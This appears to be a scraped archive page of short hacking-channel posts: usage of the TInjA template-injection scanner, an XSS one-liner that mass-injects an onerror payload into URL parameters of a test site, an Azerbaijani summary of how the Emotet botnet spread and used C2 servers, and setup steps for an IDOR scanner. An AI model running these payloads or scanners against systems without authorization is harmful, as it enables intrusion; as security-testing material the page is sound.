AzeHack/Archive

TInjA an efficient SSTI + CSTI scanner which utilizes novel polyglots tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..." tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."

echo "testphp.vulnweb.com" | gauplus | grep "?" | qsreplace 'xssz"><img/src=x onerror=confirm(999)><!--' | httpx -mr '"><img/'

Emotet Botnet Emotet ilk dəfə bank məlumatlarını oğurlamaq üçün yaradılmış zərərli proqram idi, amma daha sonra bir botnet olaraq inkişaf etdirildi və C2 infrastrukturundan istifadə etdi. Emotet-in əsas mexanizmi belə idi: Hücum üsulu: Emotet əsasən phishing e-poçtları vasitəsilə yayıldı. Bu e-poçtlarda virus olan əlavələr və ya zərərli linklər olurdu. Hədəf istifadəçi əlavəni açan kimi zərərli proqram (malware) sistemə yüklənirdi. C2 ilə əlaqə: Malware zərərçəkmişin kompüterində quraşdırılandan sonra avtomatik olaraq C2 serveri ilə əlaqə qururdu. Bu server hücumçular tərəfindən idarə olunurdu və onlar zərərli proqram vasitəsilə hədəf sistemə əmrlər göndərirdilər. Məsələn, yeni infeksiyalar yayıla bilər, məlumatlar oğurlana bilərdi. Nəticə: Emotet hücumları dünya üzrə minlərlə kompüteri infeksiya etdi. Hücumçular bu sistemləri idarə edərək, daha çox infeksiyalar yaydılar və hədəf təşkilatlardan şifrə və ya maliyyə məlumatlarını oğurladılar.

git clone https://github.com/GManOfficial/IDOR-IN cd IDOR-IN sudo pip install -r requirements.txt python3 idor_scanner.py

Latest Nuclei Release v3.3.2! https://github.com/projectdiscovery/nuclei/releases/tag/v3.3.2